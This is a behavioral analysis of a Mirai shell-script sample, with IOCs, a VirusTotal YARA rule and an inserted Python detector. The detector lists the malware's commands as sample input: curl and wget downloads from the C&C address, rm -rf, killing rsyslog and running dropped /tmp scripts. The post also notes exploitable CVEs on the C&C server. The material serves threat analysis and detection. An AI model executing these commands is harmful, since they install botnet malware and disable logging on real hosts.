Mirai threat - behavioral analysis


This article gives a quick behavioral walkthrough of the kill chain of a Mirai shell-script threat. The sample enables and starts a service called "infinitech", and issues syslog rotate commands for several log categories to manage the saved logs, for example /var/log/mail.info, /var/log/mail.warn and /var/log/mail.err.

A chmod +x command gives execution permission to the shell script 96c97823d643992baf752da7799b4d10634b3c7521371c0d80194157f.sh in the /tmp/ folder, as well as to configuration data, services and logs. The BusyBox utility suite is used by Mirai botnet threats to exploit vulnerabilities and spread Mirai infections.




Here we can see the main artifact downloading the malicious binaries from the C&C IP address 151.242.30[.]13 with the curl -O command:




The IP address in question is registered to Internet Magnate (Pty) Ltd in Turkey. The open ports and services are 21/FTP, 22/SSH, 80/HTTP, 9999/HTTP and 12121.

The FTP service is vsFTPd 3.0.5, the SSH service is OpenSSH 9.6p1, and the HTTP service is Apache HTTPD 2.4.58.

After launching the curl commands for the binaries hosted on the C&C address, the malware removes those binaries with "rm -rf" commands, downloads the second-stage artifacts with wget commands, and kills the rsyslog service.





We also see further chmod +x commands applied to a large number of .jpg files, and the busybox toolbox is copied into the /tmp/ folder.





The dropped .sh script /tmp/e5898b9899e6679a69015cf0ae104dcb.sh is also launched, and the downloaded binaries are run:





The malware also keeps its own logs, tracking which binaries were dropped and which scripts were launched:
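The command sequence described above (service enabled, chmod +x in /tmp/, curl and wget from the C&C address, rm -rf, rsyslog killed, busybox copied to /tmp/, dropped script launched) is a useful detection pattern on its own. The following is an added example, not code from the article: it scores a host's shell command history against those stages, flagging only when several co-occur. The command list is constructed sample input; the binary and image file names in it are invented, the C&C address is the one the article gives.

```python
import re

# Constructed sample of the shell commands the article describes, in order
# (not real telemetry). Binary and image names are invented; the C&C address
# is the one the article gives (written defanged there as 151.242.30[.]13).
CNC_IP = "151.242.30.13"
SAMPLE_COMMANDS = [
    "systemctl enable infinitech",
    "systemctl start infinitech",
    "chmod +x /tmp/96c97823d643992baf752da7799b4d10634b3c7521371c0d80194157f.sh",
    "curl -O http://151.242.30.13/mirai.arm7",
    "rm -rf mirai.arm7",
    "wget http://151.242.30.13/x86.jpg",
    "pkill rsyslogd",
    "cp /bin/busybox /tmp/busybox",
    "chmod +x /tmp/x86.jpg",
    "sh /tmp/e5898b9899e6679a69015cf0ae104dcb.sh",
]

# One regex per kill-chain stage described in the article.
STAGES = {
    "persistence_service": re.compile(r"^systemctl\s+(enable|start)\s+infinitech\b"),
    "exec_perm_tmp_script": re.compile(r"^chmod\s+\+x\s+/tmp/\S+\.sh\b"),
    "download_from_cnc": re.compile(rf"^(curl|wget)\b.*\b{re.escape(CNC_IP)}\b"),
    "remove_downloaded": re.compile(r"^rm\s+-rf\s+"),
    "kill_logging": re.compile(r"^(pkill|killall|kill)\b.*rsyslog"),
    "busybox_to_tmp": re.compile(r"^cp\s+\S*busybox\s+/tmp/"),
    "exec_perm_image_ext": re.compile(r"^chmod\s+\+x\s+\S+\.jpg\b"),
    "run_dropped_script": re.compile(r"^(sh|bash)\s+/tmp/\S+\.sh\b"),
}

def match_stages(commands):
    """Return the set of stage names observed across a host's command history."""
    seen = set()
    for cmd in commands:
        for name, rx in STAGES.items():
            if rx.search(cmd.strip()):
                seen.add(name)
    return seen

def classify(commands, min_stages=4):
    """Flag only when several distinct stages co-occur: a lone chmod +x or
    rm -rf is routine admin activity, the combination is not."""
    seen = match_stages(commands)
    return {"stages": sorted(seen), "suspicious": len(seen) >= min_stages}

if __name__ == "__main__":
    print(classify(SAMPLE_COMMANDS))
```

On the sample history all eight stages match; on ordinary administrative commands none do, so the host is not flagged.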




The C&C IP address exposes a number of potentially exploitable Apache HTTPD vulnerabilities, for example CVE-2025-58098 and CVE-2025-59775.






IOCs:

  • b27713a96c97823d643992baf752da7799b4d10634b3c7521371c0d80194157f
  • 2cef31d0bc48a7c98dfc582b26ff6aad459ab3c5
  • 3ed5a763ac666131083720f37fa14b32
  • 151.242.30[.]13

YARA rule (for VirusTotal Livehunt, which provides the vt module):

import "vt"

rule Mirai_20260103_CnC {
    meta:
        description = "Detects Mirai botnet with C&C information of a sample first seen on 3rd January 2026"
    condition:
        // the article defangs the address as 151.242.30[.]13; the rule has to use the raw form to match
        vt.net.url.raw icontains "151.242.30.13"
}

Sources of the OSINT screenshots: VirusTotal, AbuseIPDB, Censys, Shodan